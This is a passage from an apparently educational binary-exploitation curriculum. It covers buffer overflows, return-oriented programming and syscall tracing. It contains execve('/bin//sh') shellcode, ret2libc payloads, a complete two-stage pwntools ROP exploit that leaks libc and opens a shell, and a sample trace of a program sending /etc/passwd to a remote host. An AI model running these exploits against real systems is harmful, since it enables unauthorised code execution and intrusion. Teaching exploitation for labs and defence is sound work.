    push rsi             ; 8 zero bytes: NUL terminator for the string
    push rbx
    push rsp
    pop rdi              ; RDI points to "/bin//sh"
    mov al, 0x3b         ; syscall number for execve
    syscall
    
    • Why use xor rsi, rsi instead of mov rsi, 0?
    • Why is the string "/bin//sh" instead of "/bin/sh"?
    • What's the syscall number for execve on x64 Linux?
    • Assemble it and verify it has no null bytes
  3. Pattern Offset Calculation:
    from pwn import *
    
    # Generate a cyclic pattern
    pattern = cyclic(200)
    print(pattern)
    
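    # Feed it to the vulnerable program
    # On x86-64 the faulting ret never loads a non-canonical address into RIP,
    # so read the 8 bytes at RSP instead; say their low 4 bytes are 0x6161616c ('laaa')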
    
    # Find the offset
    offset = cyclic_find(0x6161616c)
    print(f"Offset to RIP: {offset}")
    
    • Run this against a vulnerable binary
    • Verify the offset by sending b'A' * offset + b'BBBBBBBB'
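    • Confirm the crash: the program faults at ret with 0x4242424242424242 (BBBBBBBB) on top of the stack; that value is non-canonical on x86-64, so it shows up at RSP rather than in RIP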
  4. NX Bypass Conceptual: Given a binary with NX enabled:
    • List all functions in the PLT (objdump -d vuln | grep @plt)
    • Find system@plt and puts@plt addresses
    • Locate the string โ€œ/bin/shโ€ in libc using strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
    • Conceptually design a ret2libc attack:
      payload = b'A' * offset
      payload += p64(pop_rdi_ret)    # Gadget to set RDI
      payload += p64(binsh_addr)     # Argument: "/bin/sh"
      payload += p64(system_addr)    # Call system
      

The Interview Questions They'll Ask

  1. "Walk me through the exact steps of a buffer overflow from overwrite to code execution." Expected: Unsafe function → overflow buffer → overwrite saved RBP → overwrite return address → ret instruction loads attacker's address → control flow hijacked.

  2. "Why does the stack grow downward but arrays grow upward? How does this enable overflows?" Expected: Historical architecture decision. Arrays grow toward higher addresses, so overflow overwrites later stack data (saved pointers, return addresses).

  3. "Explain the difference between controlling RIP and actually executing your payload." Expected: Controlling RIP just redirects execution. Without executable stack (NX), you must point to existing code or use ROP. With exec stack, you can point to your shellcode.

  4. "How does ASLR prevent exploitation, and how do you defeat it?" Expected: ASLR randomizes addresses, breaking hardcoded values. Defeat with info leaks (format strings, read overflows) or partial overwrites (only modify least significant bytes).

  5. "What's a stack canary and how would you bypass it?" Expected: Random value between buffer and return address. Bypass by: leaking canary value, overwriting without corrupting it, or using other vulnerabilities (format string).

  6. "Explain ret2libc. Why is it used when NX is enabled?" Expected: Return to existing library functions (like system()) instead of shellcode. Works because libc is executable and always loaded.

  7. "You have a 12-byte overflow but need 100+ bytes for shellcode. What are your options?" Expected: (1) ROP chain, (2) stack pivot to larger buffer elsewhere, (3) two-stage exploit (small stub to read larger payload), (4) ret2libc (no shellcode needed).

  8. "How do you calculate the exact offset to the return address?" Expected: Methods: (1) cyclic pattern + crash analysis, (2) GDB to examine stack, (3) source code analysis, (4) trial and error with increasing payloads.

  9. "What's the purpose of a NOP sled in shellcode exploits?" Expected: Provides margin of error. If you're not sure of exact shellcode address, point anywhere in the NOPs (0x90) and execution slides to the shellcode.

  10. "Describe a real-world scenario where buffer overflow exploitation is still relevant today." Expected: IoT devices (often no ASLR/NX), legacy systems, kernel exploits, CTF competitions, security research/testing.

Books That Will Help

| Topic | Book | Chapter/Section |
|---|---|---|
| Stack Layout & Function Calls | "Computer Systems: A Programmer's Perspective" | Ch. 3.7 (Procedures, Stack Frames) |
| Buffer Overflow Fundamentals | "Hacking: The Art of Exploitation" | Ch. 2.5 (Buffer Overflows) |
| Shellcode Writing | "Hacking: The Art of Exploitation" | Ch. 5 (Shellcode) |
| Return Address Hijacking | "Computer Systems: A Programmer's Perspective" | Ch. 3.7.3 (Data Transfer) |
| Security Mitigations (NX, ASLR, Canaries) | "Computer Systems: A Programmer's Perspective" | Ch. 3.10.3 (Stack Corruption Detection) |
| Code-Reuse Attacks (ret2libc) | "Practical Binary Analysis" | Ch. 10.2 (Code-Reuse Attacks) |
| ASLR and Randomization | "Practical Binary Analysis" | Ch. 10.3 (Randomization Defenses) |
| Low-Level Memory Layout | "Low-Level Programming" | Ch. 8 (Memory Management) |
| Exploitation Techniques | "The Shellcoder's Handbook" | Ch. 4-5 (Stack Overflows) |
| Assembly for Exploitation | "Low-Level Programming" | Ch. 3-4 (Assembly Language) |
| Debugging with GDB | "Hacking: The Art of Exploitation" | Ch. 2 (Programming, Debugging) |
| Format String Exploits | "Hacking: The Art of Exploitation" | Ch. 3 (Exploitation) |
| Heap Exploitation Intro | "The Shellcoder's Handbook" | Ch. 7 (Heap Overflows) |
| Pwntools Usage | Official Pwntools Docs | docs.pwntools.com |
| Modern Exploitation | "A Guide to Kernel Exploitation" | Ch. 1-2 (Background, Stack Overflows) |

Project 8: Return-Oriented Programming (ROP)

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Assembly understanding
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The "Resume Gold"
  • Difficulty: Level 4: Expert
  • Knowledge Area: Advanced Exploitation / Code Reuse
  • Software or Tool: ROPgadget, ropper, pwntools
  • Main Book: "The Shellcoder's Handbook"

What you'll build: Complex ROP chains that bypass NX protection by chaining together code snippets already in the binary.

Why it teaches binary analysis: ROP is the foundation of modern exploitation. It demonstrates deep understanding of calling conventions and code reuse.

Core challenges you'll face:

  • Finding gadgets → maps to instruction sequences ending in ret
  • Chaining gadgets → maps to building functionality from fragments
  • Setting up arguments → maps to calling conventions (rdi, rsi, rdx)
  • Calling system() → maps to executing /bin/sh

Resources for key challenges:

Key Concepts:

  • Gadget Types: "The Shellcoder's Handbook" Ch. 9
  • x64 Calling Convention: System V ABI
  • Stack Pivoting: ROP Emporium tutorials

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Project 7 (Buffer Overflow)

Real world outcome:

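from pwn import *

# Setting context.binary makes flat() pack integers as 64-bit little-endian values
context.binary = elf = ELF('./target')
libc = ELF('./libc.so.6')
rop = ROP(elf)

p = process('./target')
offset = 72  # placeholder: use the offset you measured for your own target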

# Find gadgets
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Leak libc address
payload = flat(
    b'A' * offset,
    pop_rdi,
    elf.got['puts'],    # Argument: puts@GOT
    elf.plt['puts'],    # Call puts to leak
    elf.symbols['main'] # Return to main for second stage
)

p.sendline(payload)
leaked = u64(p.recv(6).ljust(8, b'\x00'))
libc.address = leaked - libc.symbols['puts']

# Second stage: call system("/bin/sh")
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']

payload2 = flat(
    b'A' * offset,
    ret,                # Stack alignment
    pop_rdi,
    bin_sh,
    system
)

p.sendline(payload2)
p.interactive()

Implementation Hints:

Gadget hunting:

$ ROPgadget --binary ./target | grep "pop rdi"
0x00401233 : pop rdi ; ret
$ ROPgadget --binary ./target | grep "pop rsi"
0x00401231 : pop rsi ; pop r15 ; ret

Common ROP patterns:

  1. Leak libc: Call puts(GOT_entry) to leak address
  2. Calculate libc base: leaked_addr - offset = libc_base
  3. Find /bin/sh: Search libc for โ€œ/bin/shโ€ string
  4. Call system: pop rdi; ret + โ€œ/bin/shโ€ addr + system addr

Stack alignment:

  • x64 requires 16-byte stack alignment before call
  • Add a ret gadget if system() crashes

Learning milestones:

  1. Find gadgets → Use ROPgadget or ropper
  2. Chain simple ROP → Control function arguments
  3. Leak libc → Bypass ASLR
  4. Get shell → Complete exploitation chain

The Core Question You're Answering

How do you construct arbitrary computational logic from tiny fragments of existing code when direct code execution is impossible, and how do you chain these fragments to bypass the most sophisticated memory protection mechanisms?

This project represents the pinnacle of code-reuse attacks. You'll learn to "program" using only code snippets (gadgets) that already exist in the binary, treating the stack as your instruction stream and gadgets as your instruction set.

Concepts You Must Understand First

1. What is a Gadget?

A gadget is a short instruction sequence ending in ret. Each gadget performs a small operation (like pop rdi; ret) and returns control, allowing you to chain gadgets together.

Gadget anatomy:
   0x401234: pop rdi          ← Useful operation
   0x401235: ret              ← Returns to next gadget

Stack layout during ROP:
   +------------------+
   | Gadget 1 addr    | ← Return here first
   | Data for gadget1 |
   | Gadget 2 addr    | ← Then return here
   | Data for gadget2 |
   | Gadget 3 addr    | ← Then return here
   | ...              |
   +------------------+
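
To see why this layout chains, it can help to simulate it. The sketch below is a toy model, not an emulator: each gadget is described only by the registers it pops, `ret` is modeled as "read the next stack slot and jump there", and every address in it is an invented placeholder.

```python
def run_chain(stack, gadgets, max_steps=32):
    """Walk a list of 64-bit stack slots the way successive `ret`s would.

    stack   -- list of ints; index 0 is the slot RSP points at when the
               vulnerable function executes its `ret`
    gadgets -- maps a gadget address to the registers it pops before its own `ret`
    Returns the final register values and the first address outside the table.
    """
    regs = {}
    rsp = 0
    final_target = None
    for _ in range(max_steps):
        if rsp >= len(stack):
            break
        target = stack[rsp]            # `ret` pops the next address into RIP
        rsp += 1
        if target not in gadgets:
            final_target = target      # e.g. the entry point of a real function
            break
        for reg in gadgets[target]:    # each entry models one `pop <reg>`
            regs[reg] = stack[rsp]
            rsp += 1
    return regs, final_target


# Hypothetical gadget table and chain.
GADGETS = {
    0x401233: ["rdi"],                 # pop rdi ; ret
    0x401231: ["rsi", "r15"],          # pop rsi ; pop r15 ; ret
}
chain = [0x401233, 0x404060, 0x401231, 0x1000, 0x0, 0x401050]

regs, final_target = run_chain(chain, GADGETS)
print({name: hex(value) for name, value in regs.items()}, hex(final_target))
```

Note how the `pop rsi ; pop r15 ; ret` gadget consumes two data slots, so the chain has to supply a throwaway value for R15.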

Guiding Questions:

  • Why must gadgets end in ret?
  • How does the ret instruction enable chaining?
  • What makes a gadget "useful" vs "junk"?

Book Reference: "Practical Binary Analysis" Ch. 10.2 - Code-Reuse Attacks

2. x64 Calling Convention (System V ABI)

To call functions via ROP, you must understand argument passing: RDI (1st arg), RSI (2nd), RDX (3rd), RCX (4th), R8 (5th), R9 (6th).
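
As a rough illustration of how that register order turns into stack slots, the sketch below maps a call's arguments onto `pop <reg>; ret` gadgets. The helper names and every address are assumptions made up for the example; in a real binary some of these gadgets (especially for RDX) often do not exist and must be replaced by other sequences.

```python
ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]  # System V integer argument order


def assign_args(args):
    """Pair each argument with the register that carries it."""
    if len(args) > len(ARG_REGS):
        raise ValueError("arguments beyond the sixth are passed on the stack")
    return dict(zip(ARG_REGS, args))


def chain_for_call(func_addr, args, pop_gadgets):
    """Build the list of 64-bit slots for one call.

    pop_gadgets maps a register name to the address of a `pop <reg>; ret` gadget.
    """
    chain = []
    for reg, value in assign_args(args).items():
        if reg not in pop_gadgets:
            raise LookupError(f"no pop gadget available for {reg}")
        chain += [pop_gadgets[reg], value]
    chain.append(func_addr)
    return chain


# Hypothetical gadget and function addresses, e.g. for write(1, buf, 100).
POP_GADGETS = {"rdi": 0x401233, "rsi": 0x401235, "rdx": 0x401237}
chain = chain_for_call(0x401040, [1, 0x404080, 100], POP_GADGETS)
print([hex(slot) for slot in chain])
```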

Guiding Questions:

  • How do you call `system("/bin/sh")` with ROP? (Hint: set RDI)
  • What's the difference between x64 and x86 calling conventions?
  • Why do you need `pop rdi; ret` gadgets specifically?

Book Reference: "Low-Level Programming" Ch. 9 - Calling Conventions

3. GOT (Global Offset Table) and PLT (Procedure Linkage Table)

The GOT stores addresses of library functions (resolved at runtime). The PLT provides stubs to call them. Leaking GOT entries defeats ASLR.

Program calls printf():
   call printf@PLT  ← PLT stub

PLT stub:
   jmp [printf@GOT]  ← Jump to address in GOT

GOT entry (after first call):
   0x7ffff7a62800  ← Actual printf address in libc
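
The "after first call" detail matters for leaks. The following toy model is a deliberate simplification of lazy binding (a sentinel string stands in for "the GOT entry still points back into the PLT"); the class name and the addresses are assumptions for illustration only.

```python
class LazyBindingModel:
    """Toy model: a GOT entry holds a real address only after the first call."""

    UNRESOLVED = "resolver stub"  # stand-in for "points back into the PLT"

    def __init__(self, libc_addresses):
        self._libc = dict(libc_addresses)
        self.got = {name: self.UNRESOLVED for name in self._libc}
        self.resolver_runs = 0

    def call_via_plt(self, name):
        """Model `jmp [name@GOT]`: resolve on first use, then jump directly."""
        if self.got[name] == self.UNRESOLVED:
            self.resolver_runs += 1              # dynamic linker looks the symbol up
            self.got[name] = self._libc[name]    # and patches the GOT entry
        return self.got[name]


# Hypothetical libc addresses.
model = LazyBindingModel({"printf": 0x7FFFF7A62800, "puts": 0x7FFFF7A7C5A0})
before = model.got["printf"]
first = model.call_via_plt("printf")
second = model.call_via_plt("printf")
print(before, hex(first), hex(second), model.resolver_runs)
```

In this model, leaking the entry for a function the program has not called yet would not reveal a libc address, which is one reason exploits usually leak a function that has already run. Binaries linked with immediate binding resolve every entry at startup instead.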

Guiding Questions:

  • Why does the GOT contain real addresses but the PLT doesn't?
  • How do you leak a GOT entry to find libc base?
  • What's "lazy binding" and why does it matter for exploitation?

Book Reference: "Computer Systems: A Programmer's Perspective" Ch. 7.12 - Position-Independent Code

4. Information Leaks for ASLR Bypass

Since ASLR randomizes library addresses, you must leak an address first. Common technique: call `puts(GOT_entry)` to print the address.
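
The arithmetic behind such a leak is short enough to sketch in plain Python. The symbol offsets below are placeholders standing in for values you would read from the target's actual libc, and the helper names are hypothetical.

```python
import struct


def parse_leak(raw: bytes) -> int:
    """Convert the bytes printed by puts() into a 64-bit address.

    puts() stops at the first NUL byte, so a user-space address on x86-64
    Linux normally arrives as 6 bytes followed by a newline.
    """
    return struct.unpack("<Q", raw[:6].ljust(8, b"\x00"))[0]


def libc_base(leaked_addr: int, symbol_offset: int) -> int:
    """Subtract the symbol's offset and sanity-check page alignment."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned: wrong libc or wrong leak")
    return base


# Placeholder offsets; real ones come from the libc the target actually uses.
PUTS_OFFSET = 0x80E50
SYSTEM_OFFSET = 0x50D70

leaked = parse_leak(b"\x50\x0e\xc8\xf7\xff\x7f\n")
base = libc_base(leaked, PUTS_OFFSET)
system_addr = base + SYSTEM_OFFSET
print(hex(leaked), hex(base), hex(system_addr))
```

The page-alignment check is a cheap guard: a base address that does not end in three zero hex digits almost always means the offset came from a different libc build.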

Guiding Questions:

  • Why leak puts or printf addresses specifically?
  • How do you calculate libc base from a leaked function address?
  • What's a "two-stage" exploit and why is it necessary?

Book Reference: "Practical Binary Analysis" Ch. 10.3 - Randomization-Based Defenses

5. Stack Alignment Requirements

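The System V x86-64 ABI requires the stack pointer (RSP) to be 16-byte aligned immediately before a `call` instruction. Library code relies on this: functions such as `system()` typically crash on an aligned SSE instruction like `movaps` when a ROP chain enters them with RSP misaligned.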
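
The effect of an extra `ret` gadget is plain arithmetic, worked through in the sketch below. It assumes the first chain slot is the overwritten return address of a normally called function; the stack address and the helper names are invented for the example.

```python
def rsp_on_entry(first_slot_addr: int, slot_index: int) -> int:
    """RSP seen by code reached through the address stored in a given chain slot.

    `ret` pops 8 bytes, so on entry RSP points just past that slot.
    """
    return first_slot_addr + 8 * (slot_index + 1)


def matches_call_entry(rsp: int) -> bool:
    """A real `call` pushes 8 bytes onto a 16-byte-aligned stack, so callees
    expect RSP % 16 == 8 at their first instruction."""
    return rsp % 16 == 8


# Hypothetical address of the overwritten return-address slot. In a function
# that was called normally, this slot sits at an address with addr % 16 == 8.
FIRST_SLOT = 0x7FFD1000E018

plain = ["pop_rdi", "binsh", "system"]
padded = ["ret"] + plain

plain_ok = matches_call_entry(rsp_on_entry(FIRST_SLOT, plain.index("system")))
padded_ok = matches_call_entry(rsp_on_entry(FIRST_SLOT, padded.index("system")))
print(plain_ok, padded_ok)
```

Each extra `ret` shifts RSP by 8 bytes on entry, so one is enough to flip between the misaligned and the expected state.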

Guiding Questions:

  • Why does `system()` crash when entered from a ROP chain but work when the program calls it normally?
  • How does adding a `ret` gadget fix alignment?
  • What happens when RSP is misaligned (e.g., RSP % 16 != 0)?

Book Reference: System V ABI x86-64 specification

6. Gadget Types and Their Uses

Different gadget types serve different purposes:

  • Argument gadgets: `pop rdi; ret` (set function arguments)
  • Arithmetic gadgets: `add rax, rbx; ret` (compute values)
  • Memory gadgets: `mov [rax], rbx; ret` (write memory)
  • Control gadgets: `jmp rax` (indirect branches to a computed target)

Guiding Questions:

  • Which gadget types are essential for basic exploitation?
  • How do you handle functions requiring 3+ arguments?
  • What do you do when the perfect gadget doesn't exist?

Book Reference: "The Shellcoder's Handbook" Ch. 9 - Return-Oriented Programming

7. Libc Database and Version Fingerprinting

Different libc versions have functions at different offsets. To find the right libc, you fingerprint it by leaking multiple addresses.
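
Fingerprinting works because ASLR randomizes the base in whole pages, so the low 12 bits of every leaked address equal the low 12 bits of that symbol's offset. A minimal sketch of the matching step follows; the three "libc" entries and their offsets are fabricated for illustration and do not describe real builds.

```python
def matching_libcs(leaks, database):
    """Return the ids of database entries consistent with every leak.

    leaks    -- {symbol: leaked runtime address}
    database -- {libc_id: {symbol: offset inside that libc}}
    """
    matches = []
    for libc_id, offsets in database.items():
        if all(
            sym in offsets and (addr & 0xFFF) == (offsets[sym] & 0xFFF)
            for sym, addr in leaks.items()
        ):
            matches.append(libc_id)
    return matches


# Fabricated database entries, for illustration only.
DATABASE = {
    "libc-A": {"puts": 0x80E50, "printf": 0x606F0},
    "libc-B": {"puts": 0x84420, "printf": 0x61C90},
    "libc-C": {"puts": 0x76E50, "printf": 0x55810},
}

one_leak = matching_libcs({"puts": 0x7F3A1C280E50}, DATABASE)
two_leaks = matching_libcs(
    {"puts": 0x7F3A1C280E50, "printf": 0x7F3A1C2606F0}, DATABASE
)
print(one_leak, two_leaks)
```

A single leak often matches several candidates; each additional symbol narrows the set, which is why leaking two or three functions is the usual practice.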

Guiding Questions:

  • Why can't you just hardcode libc offsets?
  • How does a libc database (such as libc.rip or libc.blukat.me) help find the right version?
  • What happens if you use the wrong libc version in your exploit?

Book Reference: CTF writeups and online resources (libc.blukat.me, libc.rip)

8. Advanced ROP Techniques

Beyond basic ROP:

  • Stack pivoting: Move RSP to a controlled buffer
  • SROP (Sigreturn ROP): Use `sigreturn` to set all registers
  • JOP (Jump-Oriented Programming): Use `jmp` instead of `ret`
  • ret2csu: Use the register-loading gadgets in `__libc_csu_init`

Guiding Questions:

  • When do you need stack pivoting?
  • What makes SROP powerful (hint: it sets ALL registers)?
  • Why is `__libc_csu_init` present in most dynamically linked binaries built against glibc older than 2.34, and why is it missing from newer ones?

Book Reference: "Practical Binary Analysis" Ch. 10.2.3 - Advanced ROP

Questions to Guide Your Design

  1. How do you find gadgets when automated tools like ROPgadget fail or miss useful sequences? Consider manual searching, analyzing compiler-generated code, and understanding common instruction patterns.

  2. What's your strategy when you need a gadget that doesn't exist in the binary? Think about combining multiple gadgets, using library functions, or finding equivalent sequences.

  3. How would you structure a ROP chain that calls multiple functions in sequence (e.g., `mprotect()` then `shellcode()`)? Consider stack layout, argument setup, and return addresses.

  4. When you leak a libc address, how do you reliably identify which libc version is running? Think about fingerprinting multiple functions, libc databases, and offset patterns.

  5. How do you debug a ROP chain that crashes midway through execution? Consider GDB breakpoints on gadgets, stack inspection, and pwntools logging.

  6. What approach works when ASLR is enabled but you can't find a good leak primitive? Think about partial overwrites, brute force, or other information disclosure vulnerabilities.

  7. How would you automate ROP chain generation for repeated exploitation? Consider pwntools' ROP class, custom scripts, and chain templates.

  8. When exploiting a remote service, how do you handle the lack of direct debugging access? Think about local replication, binary analysis, and remote crash behavior.

Thinking Exercise

Before building complex ROP chains, complete these exercises:

  1. Manual Gadget Discovery: Take a simple binary and manually search for gadgets using objdump.

  2. Stack Layout Visualization: Draw the complete stack layout for a ROP chain step by step.

  3. Libc Leak Practice: Practice calculating libc base from leaked GOT entries.

  4. Building a Simple ROP Chain: Write a complete ROP chain to call write(1, buffer, 100).

The Interview Questions They'll Ask

  1. "Explain ROP at a high level. Why is it called 'return-oriented'?" Expected: Uses `ret` instruction to chain code snippets (gadgets). Each gadget ends with `ret`, which loads the next gadget's address from the stack.

  2. "How do you call system('/bin/sh') using ROP on x64?" Expected: Need `pop rdi; ret` to set RDI = "/bin/sh" address, then call `system@plt` or leak libc and call libc's `system`.

  3. "What's the difference between a gadget and regular shellcode?" Expected: Shellcode is custom assembly you inject. Gadgets are existing code fragments you reuse. ROP works when stack is non-executable (NX).

  4. "Why do you need to leak libc addresses? Can't you just use hardcoded offsets?" Expected: ASLR randomizes libc base address on each execution. Must leak a known function's address to calculate base.

  5. "Walk me through a two-stage ROP exploit that defeats ASLR." Expected: Stage 1: Leak libc address (puts(GOT_entry)), return to main. Stage 2: Use leaked address to calculate libc base, call system("/bin/sh").

  6. "What's stack alignment and why does system() crash in ROP but not normally?" Expected: x64 requires RSP % 16 == 0 before `call`. Normal code maintains this, but ROP might not. Fix: add `ret` gadget for alignment.

  7. "How do you find gadgets when ROPgadget doesn't find what you need?" Expected: Manual searching with objdump, looking for unintended gadgets (instructions misaligned), using ret2csu or other universal gadgets.

  8. "Explain the GOT and PLT. How do you leak a GOT entry?" Expected: PLT stubs call functions via GOT. GOT contains actual addresses (after lazy binding). Leak: call puts(GOT_entry) to print the address.

  9. "What's ret2csu and why is it useful?" Expected: `__libc_csu_init` contains gadgets that load RDX, RSI, and EDI from callee-saved registers. It is present in most dynamically linked binaries built against glibc older than 2.34 (newer toolchains no longer emit it), which made it a near-universal gadget source.

  10. "Describe a scenario where ROP is necessary vs simpler exploitation techniques." Expected: NX prevents shellcode execution, so the attacker must reuse existing code, which is exactly what ROP does. ASLR prevents hardcoded addresses, which a ROP leak stage can defeat. Stack canaries are a separate obstacle: ROP does not bypass them, so the canary must be leaked or avoided first.

Books That Will Help

| Topic | Book | Chapter/Section |
|---|---|---|
| ROP Fundamentals | "Practical Binary Analysis" | Ch. 10.2 (Code-Reuse Attacks) |
| Advanced ROP Techniques | "Practical Binary Analysis" | Ch. 10.2.3 (Advanced ROP, SROP) |
| Calling Conventions (x64) | "Low-Level Programming" | Ch. 9 (Calling Conventions) |
| GOT/PLT Mechanism | "Computer Systems: A Programmer's Perspective" | Ch. 7.12 (Position-Independent Code) |
| ROP Theory | "The Shellcoder's Handbook" | Ch. 9 (Return-Oriented Programming) |
| Stack Alignment | System V ABI x86-64 Specification | Section 3.2.2 (The Stack Frame) |
| ASLR and Bypasses | "Practical Binary Analysis" | Ch. 10.3 (Randomization Defenses) |
| Dynamic Linking | "Computer Systems: A Programmer's Perspective" | Ch. 7 (Linking) |
| Exploitation Techniques | "Hacking: The Art of Exploitation" | Ch. 5 (Shellcode) |
| Pwntools for ROP | Official Pwntools Docs | docs.pwntools.com/rop.html |
| Assembly (x64) | "Low-Level Programming" | Ch. 3-4 (Assembly Language) |
| ret2csu Technique | CTF Writeups | Multiple sources online |
| Gadget Hunting | "The Shellcoder's Handbook" | Ch. 9.2 (Finding Gadgets) |
| Stack Pivoting | "Practical Binary Analysis" | Ch. 10.2.3 (Advanced Techniques) |
| Sigreturn-Oriented Programming | Research Papers | "Framing Signals - A Return to Portable Shellcode" |

Project 9: Dynamic Analysis with strace/ltrace

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Command line tools
  • Alternative Programming Languages: Python for automation
  • Coolness Level: Level 2: Practical but Forgettable
  • Business Potential: 1. The "Resume Gold"
  • Difficulty: Level 1: Beginner
  • Knowledge Area: Dynamic Analysis / System Calls
  • Software or Tool: strace, ltrace, Linux
  • Main Book: "The Linux Programming Interface" by Michael Kerrisk

What you'll build: Analyze unknown binaries using only system call and library call tracing, without disassembly.

Why it teaches binary analysis: Sometimes you don't need disassembly. Seeing what files a program opens and what APIs it calls reveals a lot.

Core challenges you'll face:

  • Understanding syscall output → maps to knowing what each syscall does
  • Filtering noise → maps to focusing on interesting calls
  • Following child processes → maps to fork/exec tracing
  • Interpreting library calls → maps to understanding libc functions

Resources for key challenges:

Key Concepts:

  • System Calls: "The Linux Programming Interface" Ch. 3
  • Library Calls: ltrace man page
  • Process Tracing: strace man page

Difficulty: Beginner Time estimate: 3-5 days Prerequisites: Basic Linux command line

Real world outcome:

$ strace -f ./suspicious_binary 2>&1 | head -50
execve("./suspicious_binary", ...) = 0
openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3   # Reading password file!
read(3, "root:x:0:0:...", 4096) = 2847
close(3) = 0
socket(AF_INET, SOCK_STREAM, 0) = 4              # Opening socket!
connect(4, {sa_family=AF_INET, sin_port=htons(1337),
        sin_addr=inet_addr("10.0.0.1")}, 16) = 0  # Connecting to C2!
write(4, "root:x:0:0:...", 2847) = 2847          # Exfiltrating data!

$ ltrace ./crackme
__libc_start_main(...)
puts("Enter password: ")
fgets("test\n", 100, stdin)
strlen("test\n") = 5
strcmp("test", "s3cr3t_p4ss") = 1                # Password revealed! ('t' sorts after 's', so the result is positive)
puts("Wrong!")
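
Pulling the compared strings out of a long ltrace log is easy to script. The following is a rough sketch that assumes the simple one-call-per-line format shown above; the regular expression and the helper name are illustrative and will not cover every ltrace output variant (truncated strings, pointers printed as hex, and so on).

```python
import re

# Matches calls such as strcmp("a", "b") and captures both quoted arguments.
CMP_CALL = re.compile(
    r'\b(strcmp|strncmp|memcmp)\("((?:[^"\\]|\\.)*)",\s*"((?:[^"\\]|\\.)*)"'
)


def compared_strings(ltrace_output: str):
    """Return (function, first_arg, second_arg) for every comparison call."""
    return [(m.group(1), m.group(2), m.group(3)) for m in CMP_CALL.finditer(ltrace_output)]


SAMPLE = r'''
__libc_start_main(...)
puts("Enter password: ")
fgets("test\n", 100, stdin)
strlen("test\n") = 5
strcmp("test", "s3cr3t_p4ss") = 1
puts("Wrong!")
'''

found = compared_strings(SAMPLE)
for func, left, right in found:
    print(f"{func}: {left!r} compared with {right!r}")
```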

Implementation Hints:

Useful strace options:

strace -f          # Follow child processes
strace -e openat   # Only trace openat() calls (modern glibc rarely issues plain open())
strace -e file     # All file-related calls
strace -e network  # All network-related calls
strace -s 1000     # Show 1000 chars of strings
strace -o log.txt  # Output to file
strace -p PID      # Attach to running process

Useful ltrace options:

ltrace -e strcmp   # Only trace strcmp
ltrace -e '*'      # All library calls
ltrace -C          # Demangle C++ names
ltrace -n 2        # Indent nested calls by 2 spaces per level

Analysis workflow:

  1. Run with strace to see syscalls
  2. Run with ltrace to see library calls
  3. Look for interesting patterns:
    • File operations (what does it read/write?)
    • Network operations (where does it connect?)
    • String comparisons (password checks?)
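
Step 3 of this workflow can be partly automated. Below is a minimal sketch of a filter over strace text output; the category table, the "noisy path" prefixes, and the sample lines are all assumptions chosen for illustration, and the regular expression handles only complete single-line records.

```python
import re

SYSCALL_LINE = re.compile(r'^(?:\[pid\s+\d+\]\s+)?(\w+)\((.*)\)\s*=\s*(-?\d+|\?)')

INTERESTING = {
    "file": {"open", "openat", "unlink", "unlinkat", "rename"},
    "network": {"socket", "connect", "bind", "listen", "accept", "sendto", "recvfrom"},
    "process": {"execve", "fork", "vfork", "clone", "ptrace"},
}
# File opens under these prefixes are usually loader noise, not program logic.
NOISY_PATH_PREFIXES = ("/lib", "/usr/lib", "/etc/ld.so")


def classify(line: str):
    """Return (category, syscall, args) for interesting lines, else None."""
    m = SYSCALL_LINE.match(line.strip())
    if not m:
        return None
    name, args = m.group(1), m.group(2)
    for category, names in INTERESTING.items():
        if name in names:
            path = re.search(r'"([^"]*)"', args)
            if category == "file" and path and path.group(1).startswith(NOISY_PATH_PREFIXES):
                return None
            return category, name, args
    return None


SAMPLE = [
    r'execve("./suspicious_binary", ["./suspicious_binary"], 0x7ffc12345678 /* 24 vars */) = 0',
    r'mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f1c2a400000',
    r'openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3',
    r'openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3',
    r'read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2847',
    r'socket(AF_INET, SOCK_STREAM, 0) = 4',
    r'connect(4, {sa_family=AF_INET, sin_port=htons(1337), sin_addr=inet_addr("10.0.0.1")}, 16) = 0',
    r'write(4, "root:x:0:0:..."..., 2847) = 2847',
]

flagged = []
for line in SAMPLE:
    result = classify(line)
    if result is not None:
        flagged.append(result[1])
        print(f"[{result[0]}] {result[1]}({result[2]})")
```

In practice you would feed it the file written by `strace -o log.txt` and tune the tables to the behavior you care about.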

Learning milestones:

  1. Trace basic program → Understand output format
  2. Find password checks → strcmp/memcmp in ltrace
  3. Trace network activity → socket/connect/send
  4. Analyze malware behavior → Without disassembly

The Core Question You're Answering

"Can we understand what a program does by watching it interact with the operating system, without ever looking at its source code or disassembly?"

This project explores the power of behavioral analysis through system call and library call tracing. You'll learn that sometimes the most revealing information about a program comes not from what it is, but from what it does: every file it touches, every network connection it makes, every string it compares.

Concepts You Must Understand First

  1. System Calls (syscalls)
    • The boundary between user space and kernel space: how programs request services from the OS
    • Every file operation, network connection, or process creation goes through syscalls
    • Understanding syscalls reveals a program's interactions with the outside world

    Guiding Questions:

    • Why can't user-space programs directly access hardware or files?
    • What's the difference between a library call like fopen() and a syscall like open()?
    • How does the kernel validate syscall arguments to prevent malicious programs from harming the system?

    Book References:

    • "The Linux Programming Interface" by Michael Kerrisk - Chapter 3: System Programming Concepts
    • "Computer Systems: A Programmer's Perspective" (CS:APP) - Chapter 8.4: Process Control (syscall mechanics)
    • "Low-Level Programming" by Igor Zhirkov - Chapter 2.5: System Calls
  2. Process Memory Layout
    • How programs are loaded into memory (text, data, stack, heap segments)
    • Understanding memory addresses in strace output (e.g., mmap() calls)
    • Why programs request memory from the OS via brk() or mmap()

    Guiding Questions:

    • What does it mean when strace shows brk(0x5555555a2000) = 0x5555555a2000?
